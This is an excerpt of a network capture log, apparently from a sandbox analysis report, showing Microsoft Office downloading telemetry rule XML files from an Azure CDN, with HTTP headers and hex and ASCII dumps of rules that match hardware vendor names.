                                                                                                                                            2024-10-31 16:13:04 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            38192.168.2.44979513.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:04 UTC192OUTGET /rules/rule120629v0s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:04 UTC470INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:04 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 428
                                                                                                                                            Connection: close
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                                            ETag: "0x8DC582BAC4F34CA"
                                                                                                                                            x-ms-request-id: ef4969e5-401e-002a-2c3c-28c62e000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161304Z-15b8d89586fhl2qtatrz3vfkf00000000g500000000060fe
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:04 UTC428INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            39192.168.2.44979313.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:04 UTC192OUTGET /rules/rule120627v0s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:04 UTC470INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:04 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 404
                                                                                                                                            Connection: close
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT
                                                                                                                                            ETag: "0x8DC582B9E8EE0F3"
                                                                                                                                            x-ms-request-id: 1abafd92-601e-0070-072b-27a0c9000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161304Z-16849878b78q9m8bqvwuva4svc000000088g00000000gq4q
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:04 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            40192.168.2.44979713.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:04 UTC192OUTGET /rules/rule120630v0s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:04 UTC470INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:04 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 499
                                                                                                                                            Connection: close
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT
                                                                                                                                            ETag: "0x8DC582B98CEC9F6"
                                                                                                                                            x-ms-request-id: 283bb1f9-001e-0066-5cf3-2a561e000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161304Z-16849878b78fkwcjkpn19c5dsn00000008w0000000001xgn
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:04 UTC499INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            41192.168.2.44979813.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:04 UTC192OUTGET /rules/rule120631v0s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:04 UTC491INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:04 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 415
                                                                                                                                            Connection: close
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                            ETag: "0x8DC582B988EBD12"
                                                                                                                                            x-ms-request-id: 4e15243a-401e-005b-2294-2a9c0c000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161304Z-17c5cb586f62tvgppdugz3gsrn00000000hg00000000g84n
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:04 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            42192.168.2.44979913.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:04 UTC192OUTGET /rules/rule120632v0s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:04 UTC470INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:04 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 471
                                                                                                                                            Connection: close
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                            ETag: "0x8DC582BB5815C4C"
                                                                                                                                            x-ms-request-id: 5dc1b391-401e-0029-66c0-2a9b43000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161304Z-159b85dff8fj5jwshC1DFW3rgc00000001k0000000006s0q
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:04 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            43192.168.2.44980113.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:04 UTC192OUTGET /rules/rule120634v0s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:05 UTC470INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:04 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 494
                                                                                                                                            Connection: close
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                                            ETag: "0x8DC582BB8972972"
                                                                                                                                            x-ms-request-id: fa11464d-701e-0032-1f49-27a540000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161304Z-16849878b78p49s6zkwt11bbkn00000009a000000000wxdd
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:05 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            44192.168.2.44980013.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:04 UTC192OUTGET /rules/rule120633v0s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:05 UTC470INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:04 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 419
                                                                                                                                            Connection: close
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                            ETag: "0x8DC582BB32BB5CB"
                                                                                                                                            x-ms-request-id: 128a8aa7-901e-005b-27fd-272005000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161304Z-15b8d89586f989rkwt13xern5400000004yg00000000kc69
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:05 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            45192.168.2.44980213.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:05 UTC192OUTGET /rules/rule120635v0s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:05 UTC470INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:05 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 420
                                                                                                                                            Connection: close
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                                            ETag: "0x8DC582B9DAE3EC0"
                                                                                                                                            x-ms-request-id: ce95f5ab-001e-0034-242a-27dd04000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161305Z-17c5cb586f67hfgj2durhqcxk800000008ng00000000em8b
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:05 UTC420INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            46192.168.2.44980313.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:05 UTC192OUTGET /rules/rule120636v0s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:05 UTC470INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:05 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 472
                                                                                                                                            Connection: close
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                                            ETag: "0x8DC582B9D43097E"
                                                                                                                                            x-ms-request-id: 2a43884c-b01e-0098-517c-2acead000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161305Z-15b8d89586fvpb59307bn2rcac00000004w000000000bgq2
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:05 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            47192.168.2.44980513.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:05 UTC192OUTGET /rules/rule120638v0s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:05 UTC470INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:05 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 486
                                                                                                                                            Connection: close
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT
                                                                                                                                            ETag: "0x8DC582B92FCB436"
                                                                                                                                            x-ms-request-id: daa440d4-101e-0028-4cca-2a8f64000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161305Z-17c5cb586f6tg7hbbt0rp19dan000000022000000000a8ks
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
